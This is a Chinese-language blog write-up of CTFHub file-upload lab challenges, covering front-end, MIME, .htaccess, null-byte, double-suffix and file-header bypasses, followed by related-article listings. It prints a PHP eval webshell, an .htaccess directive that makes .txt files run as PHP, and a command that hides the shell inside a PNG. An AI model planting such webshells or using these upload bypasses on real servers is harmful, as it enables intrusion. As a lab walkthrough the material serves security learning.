ctfhub文件上传

最新推荐文章于 2024-02-15 17:20:41 发布
最新推荐文章于 2024-02-15 17:20:41 发布
阅读量1.1k 收藏 6
点赞数 10
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/128737341
版权

目录

1.无限制

 2.前端验证

 3.htaccesss

4.MIME绕过

5.00截断

 6.双写后缀

7.文件头检查

1.无限制

无限制,直接上传一句话木马

<?php
@eval($_POST['shell']);
?>

e

 上传成功后,提供相对路径,使用蚁剑或菜刀连接,这里使用蚁剑

连接成功并找到flag

 2.前端验证

启动环境,无法上传php文件

查看源代码,发现只能上传jpg,png,gif格式文件

 将文件名后缀改成jpg,上传成功,使用bp抓包

 把filename改成1.php和Content-Type改为php

发送数据包后使用蚁剑连接

连接成功并找到flag

 

 3.htaccesss

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

查看源代码 发现php文件在黑名单下被拦截

先上传一个.htaccess文件,内容如下

AddType application/x-httpd-php .txt

修改文件名为.htaccess

 

再上传一句话木马jpg文件

 

 上传成功后使用蚁剑连接

 连接成功后找到flag

4.MIME绕过

服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法的,因此在文件上传时把数据包中的Content-Type值更改为image/png就可以达到绕过的目的。

发送php文件,再使用bp抓包

修改Content-Type为php后发送数据包

连接蚁剑

连接成功后获得flag

5.00截断

00截断是操作系统层的漏洞,url中%00表示ascll码中的0 ,

在有些函数处理时,会把这个字符当做结束符

查看源代码,发现只能上传jpg,png,gif文件

因此上传jpg文件,使用bp抓包构造00截断

 发送数据包后使用蚁剑连接

 连接成功找到flag

 6.双写后缀

查看源代码,发现需要用双写后缀

 上传php文件,bp抓包

修改filename为1.pphphp

发送数据包后连接

 连接成功找到flag

 

7.文件头检查

随便找一张简单的图片命名为1.png,用cmd与php一句话木马生成一个名为22.php的木马

copy 1.png/b + 1.php/a  22.php

 然后将此木马上传,使用bp抓包,修改Content-Type为使用image/jpg

使用蚁剑连接

 连接成功找到flag

 

 

木…
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
ctf+web安全+任意文件+任意文件下载
10-08
ctf+web安全+任意文件+任意文件下载
河南省网络安全高校战队联盟CTF训练营-web文件第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件第一期 脚本及工具
CTFHub技能树web之文件(一)
wzhwzh123321的博客
02-15 1205
使用蚁剑连接,上的.htaccess文件文件名字只能是.htaccess,只能有后缀而不能有文件的名,比如1.htaccess等,在第一次上中我使用了1.htaccess,在后续上jpg格式文件后服务器没有自动将jpg解析为php文件,需要注意。JavaScript会对我们上文件进行限制,允许图片格式上,可以通过上图片马或者使用bp修改一下文件后缀即可,本题使用bp修改文件后缀的方法,先将文件后缀修改为.jpg格式,文件然后抓包。文件目录权限:确保上目录的适当权限设置非常重要。
ctfhub文件(特详解)
小宇的web博客
06-17 5076
ctfhub文件 1.无验证 1.查看题目,这里上文件没有限制,直接写一个一句话木马写一个网站后门。方法为在记事本上写上以下的木马,然后改变后缀改为php 2.这里需要中国蚁剑来进行操作,这里请自行百度,打开中国蚁剑后右键添加数据,然后在url中输入访问这个文件所在位置的url,在密码上面输入hack(这里输入hack即可)。 3.添加后双击打开。 4.这里发现flag打开即可。 2.前端验证 1.前端靠JavaScript来进行验证,这里可以直接把火狐浏览器的JavaScript的功能
CTFHub文件
遇事不决冲冲冲
04-17 1326
MIME绕过 知识点 MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类,也就是我们抓包时常见的Content-Type。 常见的MIME类型,例如: 超文本
ctfhub 文件
qq_44640313的博客
01-17 392
ctfhub文件WP,最后两题用蚁剑,其余命令执行
CTFHub 文件
WXY17387209358的博客
02-04 746
ctfhub文件无限制
CTFHub技能树 Web-文件详解
千寻的博客
11-21 2843
文件漏洞是指由于程序员在对用户文件部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上可执行的动态脚本文件。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。“文件”本身没有问题,有问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
CTFHub-Web-文件
qq_54037445的博客
11-29 2709
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端会验证,只能上图片中列出的类型将文件名后缀含有的这些全部替换为空。
CTFHUB-文件
m0_64180167的博客
12-25 1143
注意要改名字 我在这出现了问题是我没改文件名字 一直上失败 于是我又在后缀上加.php才上成功。发现失败了 试错后发现 我们一定要把上文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上
3.18号日报,ctfhub中web,文件漏洞题目解法
最新发布
03-18
文件漏洞
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTFHub 文件 - htaccess
ph51342的博客
07-03 372
CTFHub 文件 – htaccess
ctfhub 文件综合
kindyyy的博客
05-18 883
无限制(用bp插入木马也行) 文件漏洞是指网络攻击者上了一个可执行的文件到服务器并执行。这里上文件可以是木马,病毒,恶意脚本或者WebShell等。 无限制就直接使用蚁剑,先写一个一句话木马(从百度上找找???) (ps:eval()函数:还有php,eval允许执行任何php的代码,而php代码又可以调用系统,post入的字符串会以php的形式运行)相当于是一句话木马的解释吧.... 然后将他上到题目中, 上完成后打开蚁剑,将URL地址复制粘贴进去,后面要记得加上uploa
ctfhub文件---文件头检查
x2813488062的博客
01-29 2169
解题思路 每个文件都有自己的标识符,在文件输时会进行检测 文件头检查,在进行文件时不仅对文件格式进行了校验,也对文件内容进行了验证 我们可以把木马文件包含在可验证的文件中 来绕过验证 解题 用画图工具创建一个简单的png文件,复杂的会报错 然后在把png文件进行上,用Br抓包,把脚本内容插入png内容中,并把png文件修改为php文件 拿到相对地址后,可查看相对地址内容是否正确有误 用Hackbar对PHP文件递数据,查看是否有误(也可以将phpinfp();直接写入木马.
CTFhub 文件漏洞 靶场实战通关攻略
hackzkaq的博客
11-02 515
1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入PNG文件文件头。1、使用010editor新建文件,输入一句话木马,在其前面输入10次空格,再切换为十六进制的形式,在文件的最前面加入JPG文件文件头。1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,1、准备好一张PNG图片和一个脚本文件test.php,文件内容为一句话木马,在cmd命令行中输入命令进行文件拼接,
CTFHUB文件
09-06
文件是一种将文件从客户端上到服务器的过程。在CTFHUB中,文件可以用来绕过安全限制并获取敏感信息。有几种常见的方法可以进行文件,包括.htaccess上、.php木马文件文件名后缀双写绕过。 在.htaccess上方法中,首先上.htaccess文件,然后上文件都会解析为php文件。可以将一个.php文件改成.png文件,并返回上成功的路径。可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过MIME类型限制。 另一种方法是直接上.php木马文件,由于没有任何限制,可以直接上成功,并显示上文件的相对路径。同样可以使用蚁剑等工具连接服务器,***例如将上文件的后缀改为phphpp,上成功后可以返回路径。如果发现文件后缀是hpp,则需要重新更改后缀再次上。同样可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过后缀限制。 总结来说,CTFHUB文件可以***连接服务器,并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFHub_文件](https://blog.csdn.net/weixin_47443077/article/details/119453421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值